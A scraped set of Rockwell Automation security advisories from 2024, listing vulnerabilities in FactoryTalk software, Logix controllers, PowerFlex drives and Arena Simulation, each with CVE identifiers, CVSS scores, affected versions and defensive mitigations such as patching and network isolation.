A user authentication vulnerability exists in the affected product. The vulnerability allows a user from a remote system with FTView to send a packet to the customer’s server to view an HMI project. This action is allowed without proper authentication verification.

CSVV 4.0 Base Score: 8.2/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE-287: Improper Authentication

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

JSON CVE-2024-37367

High

SD1674 | FactoryTalk® View SE Local Privilege Escalation Vulnerability via Local File Permissions

Published Date:

June 12, 2024

Last Updated:

December 01, 2024

CVE IDs:

CVE-2024-37369

CVSS Scores (v3.1):

7.8

CVSS Scores (v4.0):

8.5

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: June 13, 2024

Last updated: June 13, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.8/10, v4.0: 8.5/10

The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in software version

Corrected in software version

FactoryTalk® View SE

V12.0

v14

Mitigations and Workarounds

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.   

Use the Secure Install option when installing FactoryTalk® Services Platform.

Security Best Practices

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring systems to assess the following vulnerabilities.

CVE-2024-37369 IMPACT

A privilege escalation vulnerability exists in the affected product. The vulnerability allows low-privilege users to edit scripts, bypassing Access Control Lists, and potentially gaining further access within the system.

CVSS 3.1 Base Score: 7.8/10  

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CSVV 4.0 Base Score: 8.5/10

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-732: Incorrect Permission Assignment for Critical Resource

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

JSON CVE 2024-37369

High

SD1673 | Multicast Request Causes major nonrecoverable fault on Select Controllers

Published Date:

June 12, 2024

Last Updated:

December 01, 2024

CVE IDs:

CVE 2024-5659

CVSS Scores (v3.1):

7.4

CVSS Scores (v4.0):

8.3

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

Yes

More Details Less Details

Published Date: June 11, 2024

Last updated: June 11, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.4/10, 4.0: 8.3/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in firmware revision

Corrected in firmware revision

ControlLogix® 5580

V34.011

V34.014, V35.013, V36.011 and later

GuardLogix 5580

V34.011

V34.014, V35.013, V36.011 and later

1756-EN4

V4.001

V6.001 and later

CompactLogix 5380

V34.011

V34.014, V35.013, V36.011 and later

Compact GuardLogix 5380

V34.011

V34.014, V35.013, V36.011 and later

CompactLogix 5480

V34.011

V34.014, V35.013, V36.011 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

Rockwell Automation was made aware of a vulnerability that causes all affected controllers on the same network to result in a major nonrecoverable fault(MNRF/Assert). This vulnerability could be exploited by sending abnormal packets to the mDNS port If exploited, the availability of the device would be compromised.

CVE-2024-5659 IMPACT

CVSS Base Score v3.1: 7.4/10

CVSS Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVSS Base Score v4.0: 8.3/10

CVSS Vector String: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H

CWE: CWE 670 – Always Incorrect Flow Implementation

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply the risk mitigations, where possible.

· Users who do not use Automatic Policy Deployment (APD) should block mDNS port, 5353 to help prevent communication.

· Enable CIP Security. CIP Security with Rockwell Automation Products Application Technique

· Security Best Practices

ADDITIONAL RESOURCES

· JSON CVE 2024 - 5659

SD1672 | IMPORTANT NOTICE: Rockwell Automation Reiterates Customer Guidance to Disconnect Devices from the Internet to Protect from Cyber Threats

Published Date:

May 21, 2024

Last Updated:

August 07, 2025

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

IMPORTANT NOTICE: Rockwell Automation Reiterates Customer Guidance to Disconnect Devices from the Internet to Protect from Cyber Threats

Due to heightened world tensions and negative cyber activity, Rockwell Automation suggests customers take IMMEDIATE action. Customers should check if they have devices facing the public internet. If so, remove that connectivity for devices not designed for public internet connectivity.

Rockwell Automation has guidance for all devices not specifically designed for public internet connectivity. Users should never configure their devices to be directly connected to the public-facing internet. Removing that connectivity as a proactive step reduces the attack surface. This can immediately reduce exposure to unauthorized and malicious cyber activity from external threat actors.

Rockwell Automation and CISA (Cybersecurity and Infrastructure Security Agency) provide more information on attacks on public-internet-exposed assets. This includes information on how to identify exposed assets and disconnect them from the public internet.

Rockwell Automation suggests customers follow the security best practices if disconnection is not possible: Rockwell Automation | Security Best Practices [login required].

Customers should be aware of the following related CVE’s and ensure mitigations are in place.

CVE No.	Alert Code (ICSA)	Advisory Name and Link, URL
2021-22681	21-056-03	CISA \| Rockwell Automation Logix Controllers (Update A) https://www.cisa.gov/news-events/ics-advisories/icsa-21-056-03
2022-1159	22-090-07	CISA \| Rockwell Automation Studio 5000 Logix Designer https://www.cisa.gov/news-events/ics-advisories/icsa-22-090-07
2023-3595	23-193-01	CISA \| Rockwell Automation Select Communication Modules https://www.cisa.gov/news-events/ics-advisories/icsa-23-193-01
2023-46290	23-299-06	CISA \| Rockwell Automation FactoryTalk Services Platform https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-06
2024-21914	24-086-04	CISA \| Rockwell Automation FactoryTalk View ME https://www.cisa.gov/news-events/ics-advisories/icsa-24-086-04
2024-21915	24-046-16	CISA \| Rockwell Automation FactoryTalk Service Platform https://www.cisa.gov/news-events/ics-advisories/icsa-24-046-16
2024-21917	24-030-06	CISA \| Rockwell Automation FactoryTalk Service Platform https://www.cisa.gov/news-events/ics-advisories/icsa-24-030-06

High

SD1671 | FactoryTalk® Remote Access™ Has Unquoted Executables

Published Date:

May 07, 2024

Last Updated:

December 04, 2024

CVE IDs:

CVE-2024-3640

CVSS Scores (v3.1):

7.7

CVSS Scores (v4.0):

7.0

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: May 14, 2024

Last updated: August 6, 2025

Revision Number: 1.0

CVSS Score: v3.1: 7.7/10, v4.0: 7.0

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in software version

Corrected in software version

FactoryTalk® Remote Access™ (FTRA)

v13.5.0.174

V13.6

SECURITY ISSUE DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-3640 IMPACT

An unquoted executable path exists in the affected products. This could result in remote code execution if exploited. When running the FTRA installer package, the executable path is not properly quoted. This could allow a threat actor to enter a malicious executable and run it as a System user. A threat actor needs admin privileges to exploit this.

CVSS Base Score v3.1: 6.5/10

CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-428: Unquoted Search Path or Element

CVSS Base Score v4.0: 7.0/10

CVSS Vector String 4.0: CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

Mitigations and Workarounds

Customers using the affected software that are not able to upgrade to one of the corrected versions should use the security best practices.

Security Best Practices

ADDITIONAL RESOURCES

The link provides CVE information in Vulnerability Exploitability Exchange (VEX) format. This is machine readable and can be used to automate vulnerability management and tracking activities.

JSON CVE-2024-3640

Glossary

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Unquoted Executable Path: a vulnerability that occurs when a service is created with an executable path containing spaces and isn’t enclosed within quotes

Vulnerability Exploitability Exchange (VEX): a framework that allows software suppliers or other parties to assert the status of specific vulnerabilities in a particular product

High

SD1670 | Datalog Function within in FactoryTalk® View SE Contains SQL Injection Vulnerability

Published Date:

May 07, 2024

Last Updated:

December 03, 2024

CVE IDs:

CVE-2024-4609

CVSS Scores (v3.1):

7.6

CVSS Scores (v4.0):

8.8

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: May 15, 2024

Last updated: August 6, 2025

May 22, 2024 - Updated corrected software versions

Revision Number: 2.0

CVSS Score: v3.1: 7.6/10, v4.0 8.8/10

The security of our products is important to us as your industrial automation supplier. This issue was found internally during routine testing and is being reported based on our commitment to transparency and all business environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in software version

Corrected in software version

FactoryTalk® View SE

< 14

V11,12,13, 14 or later

SECURITY ISSUE DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

A security issue exists in the FactoryTalk® View SE Datalog function. This could allow a threat actor to inject a malicious SQL statement if the SQL database has no authentication in place or if legitimate credentials were stolen. The attack could result in information exposure, revealing sensitive information. A threat actor could then modify and delete the data in a remote database. An attack would only affect the HMI design time, not runtime.

CVE-2024-4609 IMPACT

CVSS v3.1 Base Score: 7.6

CVSS Vector String: CVSS 3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

CVSS v4.0 Base Score: 8.8

CVSS Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N

CWE: CWE-20 Improper input invalidation

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to create more environmentally specific categories.

Mitigations and Workarounds

Customers using the affected software that are not able to upgrade to one of the corrected versions should use security best practices.  

Security Best Practices

ADDITIONAL RESOURCE

The link provides CVE information in Vulnerability Exploitability Exchange (VEX) format. This is machine readable and can be used to automate vulnerability management and tracking activities.

JSON CVE-2024-4609

Glossary
HMI Design Time: the process of creating and designing Human-Machine Interface screens
Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited
SQL Statement: Used to communicate with databases. A statement is a command to be understood by the interpreter and executed by the SQL engine.
Vulnerability Exploitability Exchange (VEX): a framework that allows software suppliers or other parties to assert the status of specific vulnerabilities in a particular product

High

SD1669 | FactoryTalk® Historian SE Vulnerable to AVEVA-2024-001 and AVEVA-2024-002

Published Date:

May 06, 2024

Last Updated:

November 19, 2024

CVE IDs:

CVE-2023-31274, CVE-2023-34348

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

7.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: May 9, 2024

Last updated: August 5, 2025

Revision Number: 1.0

CVSS Score: v3.1: 7.5/10, v4.0: 7.7/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Versions

Corrected in software version

FactoryTalk® Historian SE

< v9.0

v9.01 and later

SECURITY ISSUE DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following security issues.

CVE-2023-31274 IMPACT

FactoryTalk® Historian SE utilizes the AVEVA PI Server, which contains a security issue. This could allow an unauthenticated user to cause a partial denial-of-service condition. This happens in the PI Message Subsystem of a PI Server by consuming available memory. This exists in FactoryTalk® Historian SE versions 9.0 and earlier. Use of this issue could cause FactoryTalk® Historian SE to become unavailable. This would requiring a power cycle to recover it.

CVSS Base Score v3.1: 7.5/10

CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score v4.0: 7.7/10

CVSS Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H

CWE: Dependency on Vulnerable third-party Component

CVE-2023-34348 IMPACT

FactoryTalk® Historian SE use the AVEVA PI Server. This contains a security issue that could allow an unauthenticated user to remotely crash the PI Message Subsystem of a PI Server. This would result in a denial-of-service condition. This issue exists in FactoryTalk® Historian SE versions 9.0 and earlier. Use of this could cause FactoryTalk® Historian SE to become unavailable. This requires a power cycle to recover it.

CVSS Base Score v3.1: 7.5/10

CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score v4.0: 7.7/10

CVSS Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H

CWE: Dependency on Vulnerable third-party Component

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Mitigations and Workarounds

Customers using the affected software should install FactoryTalk® Historian SE version 9.01 or higher as soon as feasible. For customers unable to upgrade to v9.0, defensive measures are available in the Rockwell article.

https://idp.rockwellautomation.com/adfs/ls/idpinitiatedsignon.aspx?RelayState=RPID%3Drockwellautomation.custhelp.com%26RelayState%3Danswers%2Fanswer_view%2Fa_id%2F1150873

Customers should use our suggested security best practices to minimize the risks.

Security Best Practices

ADDITIONAL RESOURCES

Glossary

Denial-of-Service: malicious attempt to overwhelm a web property with traffic in order to disrupt its normal operations

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

PI Message Subsystem: A part of the PI System that handles logging and messaging. IT is responsible for managing PI Logs, which are binary files located in the PI/Log folder on a PI Server or PIPC/Log on clients and interfaced nodes

Critical

SD1668 | FactoryTalk® Production Centre Vulnerable to Apache ActiveMQ Vulnerability

Published Date:

April 18, 2024

Last Updated:

December 03, 2024

CVE IDs:

CVE-2023-4664

CVSS Scores (v3.1):

9.8

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

No

More Details Less Details

Published Date: April, 16, 2024

Last updated: April 16, 2024

Revision Number: 1.0

CVSS Score: 9.8 /10

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in Software Version	Corrected in Software Version
FactoryTalk® Production Centre	10.0	11.03.00

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

CVE-2023-4664 IMPACT

Apache ActiveMQ, a component utilized in FactoryTalk Production Centre, is vulnerable to Remote Code Execution. The vulnerability may allow a remote threat actor with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol. This could cause the broker to instantiate any class on the classpath.

CVSS Base Score: 9.8

CVSS Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: 502 Deserialization of Untrusted Data

Known Exploited Vulnerability (KEV) database: Yes

Users can use Stakeholder-Specific Vulnerability Categorization to generate environment specific prioritization.

Mitigations and Workarounds

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.

· Update to the version that fixes the issue as detailed in this article.
· Follow the security recommendations in PN1592 for FTPC.
· Implement Security Best Practices

ADDITIONAL RESOURCES

· JSON CVE-2023-46604

Critical

SD1666 | ControlLogix® and GuardLogix® Vulnerable to Major Nonrecoverable Fault Due to Invalid Header Value

Published Date:

April 11, 2024

Last Updated:

December 04, 2024

CVE IDs:

CVE-2024-3493

CVSS Scores (v3.1):

8.6

CVSS Scores (v4.0):

9.2

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: April 11, 2024

Last updated: August 5, 2025

Revision Number: 2.0

May 2, 2024 - Added to products to Affected Products and Solutions section

CVSS Score:v.3.1 8.6/10, v.4.0 9.2/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Firmware Revision

Corrected in Firmware Revision

ControlLogix® 5580

V35.011

V35.013, V36.011 and later

GuardLogix 5580

V35.011

V35.013, V36.011 and later

CompactLogix 5380

V35.011

V35.013, V36.011 and later

Compact GuardLogix 5380

V35.011

V35.013, V36.011 and later

1756-EN4TR

V5.001

V6.001 and later

ControlLogix 5580 Process

V35.011

V35.013, V36.011 and later

CompactLogix 5380 Process

V35.011

V35.013, V36.011and later

CompactLogix 5480

V35.011

V35.013, V36.011 and later

SECURITY ISSUE DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following security issues.

CVE-2024-3493 IMPACT

A specific malformed fragmented packet type can cause a Major Nonrecoverable Fault (MNRF). The affected product could become unavailable and require a manual restart to recover it. A MNRF could result in a loss of view and/or control of connected devices.

CVSS Base Score: 8.6/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVSS Base Score: 9.2/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H

CWE: Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Mitigations and Workarounds

Customers using the affected software that are not able to upgrade to one of the corrected versions should use the security best practices.  

Security Best Practices

ADDITIONAL RESOURCES

The link provides CVE information in Vulnerability Exploitability Exchange (VEX) format. This is machine readable and can be used to automate vulnerability management and tracking activities.

JSON CVE 2024-3493

Glossary
Fragment Packet: may be generated automatically by devices that send large amounts of data
Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited
Major Nonrecoverable Fault (MNRF): an error that occurs in a system or device and prevents it from recovering or functioning properly
Vulnerability Exploitability Exchange (VEX): a framework that allows software suppliers or other parties to assert the status of specific vulnerabilities in a particular product

SD1667 | Input/output Device Vulnerable to Major Nonrecoverable Fault

Published Date:

April 11, 2024

Last Updated:

December 04, 2024

CVE IDs:

CVE-2024-2424

Products:

5015-AENFTXT

CVSS Scores (v3.1):

7.5

CVSS Scores (v4.0):

8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: April 11, 2024

Last updated: April 17, 2024

Revision Number: 2.0

4/17/24 - Updated Affected Products and Solutions

CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in firmware version

Corrected in firmware version

5015-AENFTXT

v2.011

v2.012 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-2424 IMPACT

An input validation vulnerability exists among the affected products that causes the secondary adapter to result in a major nonrecoverable fault (MNRF) when malicious input is entered. If exploited, the availability of the device will be impacted, and a manual restart is required. Additionally, a malformed PTP packet is needed to exploit this vulnerability.

CVSS 3.1 Base Score: 7.5/10

CVSS Vector: CVSS: 3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7/10

CVSS Vector: CVSS: 4.0 CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.

Security Best Practices

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.

JSON CVE 2024-2424

High

SD1665 | Arena® Simulation Vulnerabilities

Published Date:

March 26, 2024

Last Updated:

October 16, 2024

CVE IDs:

CVE-2024-21912, CVE-2024-21913, CVE-2024-2929, CVE-2024-21918, CVE-2024-21919, CVE-2024-21920

Products:

Arena® Simulation Software

CVSS Scores (v3.1):

7.8, 4.4

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Arena® Simulation Vulnerabilities
Published Date: March 26, 2024
Last updated: August 5, 2025
Revision Number: 1.0
CVSS Score: 7.8

AFFECTED PRODUCTS AND SOLUTION

Affected Product	CVE	First Known in Software Version	Corrected in Software Version
Arena® Simulation Software	CVE-2024-21912	16.00	16.20.03
	CVE-2024-21913
	CVE-2024-2929
	CVE-2024-21918
	CVE-2024-21919
	CVE-2024-21920	16.00	This issue is within the Microsoft dynamic library link file and will not be remediated. Do not open untrusted files from unknown sources to mitigate the issue

SECURITY ISSUE DETAILS

These security issues were reported to Rockwell Automation by Michael Heinzl. Rockwell Automation uses the latest version of the CVSS scoring system to assess the following security issues.

CVE-2024-21912 IMPACT

An arbitrary code execution security issue could let a threat actor insert unauthorized code into the software. This is done by writing beyond the designated memory area. This causes an access violation. The threat actor could then run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To use this, the user would unknowingly need to open a corrupt file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database: No

CVE-2024-21913 IMPACT

A heap-based memory buffer overflow security issue could allow a threat actor to insert unauthorized code into the software. This is done by overstepping the memory boundaries, which triggers an access violation. A threat actor could then run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To use this, the user would unknowingly need to open a corrupt file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-122: Heap-based Buffer Overflow

Known Exploited Vulnerability (KEV) database: No

CVE-2024-2929 IMPACT

A memory corruption security issue could allow a threat actor to insert unauthorized code to the software. This is done by corrupting the memory triggering an access violation. The threat actor could then run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To use this, the user would unknowingly need to open a corrupted file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer

Known Exploited Vulnerability (KEV) database: No

CVE-2024-21918 IMPACT

A memory buffer security issue could allow a threat actor to insert unauthorized code to the software. This is done by corrupting the memory and triggering an access violation. The threat actor could then run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To use this, the user would unknowingly need to open a corrupted file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416: Use After Free

Known Exploited Vulnerability (KEV) database: No

CVE-2024-21919 IMPACT

An arbitrary code execution vulnerability was located in memory location of this product. This could result in a threat actor leveraging a uninitialized pointer and passing it throughout the application. This could allow a threat actor to insert unauthorized code to the software resulting in undefined behaviors. The threat actor could then run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To use this, the user would unknowingly need to open a corrupted file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-824: Access of Uninitialized Pointer

CVE-2024-21920 IMPACT

A memory buffer security issue could allow a threat actor read beyond the intended memory boundaries. This could reveal sensitive information and cause the application to crash. This would result in a denial-of-service condition. To use this, the user would unknowingly need to open a corrupted file shared by the threat actor.

CVSS Base Score: 4.4
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L
CWE-125: Out-of-bounds Read

Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds

Customers using the affected software should use the risk mitigations and security best practices.

Do not open untrusted files from unknown sources.
For information on Security Risks for industrial automation control systems, customers should use our suggested security best practices to minimize the risks.

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

ADDITIONAL RESOURCES

Glossary

Arbitrary Code Execution: an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process

Denial-of-Service: malicious attempt to overwhelm a web property with traffic in order to disrupt its normal operations

Heap-based Memory Buffer Overflow: a type of buffer overflow that occurs in the heap data area. Memory on the heap is dynamically allocated at runtime and typically contains program data.

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Memory Buffer: occurs when a program writes more data to a buffer than it can hold. This can lead to data corruption, program crashes, or unintended behavior

Memory Corruption: occurs when a flaw in software leads to the modification of memory in unintended ways, potentially causing unexpected behavior or providing avenues for exploitation

Uninitialized Pointer: occurs when a program accesses or uses a pointer that has not been initialized. If the pointer contains an uninitialized value, it might not point to a valid memory location, leading to unpredictable behavior and potential security vulnerabilities

High

SD1664 | Denial-of-service and Input Validation Vulnerabilities in PowerFlex® 527

Published Date:

March 21, 2024

Last Updated:

December 04, 2024

CVE IDs:

CVE-2024-2425, CVE-2024-2426, CVE-2024-2427

Products:

PowerFlex® 527

CVSS Scores:

7.5, 8.7

Known Exploited Vulnerability (KEV):

No

Corrected:

No

Workaround:

Yes

More Details Less Details

Published Date: March 21, 2024
Last updated: August 5, 2025
Revision Number: 1.0
CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product	First Known in software version	Corrected in software version
PowerFlex® 527	v2.001.x <	n/a

SECURITY ISSUE DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following security issues.

CVE-2024-2425 IMPACT

A denial-of-service security issue exists in the PowerFlex® 527 due to improper input validation in the device. The web server would then crash and need a manual restart to recover it.

CVSS Base Score 3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score 4.0: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE – 120 Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

CVE-2024-2426 IMPACT

A denial-of-service security issue exists in the PowerFlex® 527 due to improper input validation in the device. A disruption in the CIP communication could occur and a manual restart will be required by the user to recover it.

CVSS Base Score 3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score 4.0: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE – 120 Improper Input Validation

Known Exploited Vulnerability (KEV) database: No

CVE-2024-2427 IMPACT

A denial-of-service security issue exists in the PowerFlex® 527. This is due to improper traffic throttling in the device. If multiple data packets are sent to the device repeatedly the device will crash and require a manual restart to recover.

CVSS Base Score 3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score 4.0: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-400: Uncontrolled Resource Consumption

Users can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

Mitigations and Workarounds

There is no fix currently for this issue. Customers using the affected software should use the risk mitigations and security best practices.

Implement network segmentation confirming the device is on an isolated network.
Disable the web server, if not needed. The web server is disabled by default. Disabling this feature is available in v2.001.x and later.
Security Best Practices

ADDITIONAL RESOURCES

Glossary

CIP Communication: Common Industrial Protocol (CIP) is a common communication standard that is widely used in industrial automation. Comprises a series of protocols for communication between different devices and systems in automation technology

Denial-of-Service: malicious attempt to overwhelm a web property with traffic in order to disrupt its normal operations

Traffic Throttling: a method used to intentionally slow down internet speed or data transmission to manage network congestion and ensure fair usage among users

Medium

SD1663 | FactoryTalk® View ME on PanelView™ Plus 7 Boot Terminal lack Security Protections

Published Date:

March 21, 2024

Last Updated:

December 03, 2024

CVE IDs:

CVE-2024-21914

Products:

FactoryTalk® View ME

CVSS Scores (v3.1):

5.3

CVSS Scores (v4.0):

6.9

Known Exploited Vulnerability (KEV):

No

Corrected:

Yes

Workaround:

No

More Details Less Details

Published Date: March 21, 2024
Last updated: August 5, 2025
Revision Number: 1.0
CVSS Score: v3.1 5.3/10, v.4.0 6.9/10

The security of our products is important to us as your industrial automation supplier. This issue was found internally during routine testing and is being reported based on our commitment to transparency and all business environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in software version

Corrected in software version

FactoryTalk® View ME

<v14

V11

V12

V13

V14

SECURITY ISSUE DETAILS

Rockwell Automation used CVSS v3.1 and v4.0 scoring system to assess the following security issues.

CVE-2024-21914 IMPACT

A security issue exists in the affected product. This allows a threat actor to restart the PanelView™ Plus 7 terminal remotely without security protections. This could lead to the loss of view or control of the PanelView™ product.

CVSS 3.1 Base Score: 5.3

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS 4.0 Base Score: 6.9

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

CWE: Improper security protection for remote restart action

Known Exploited Vulnerability (KEV) database: No

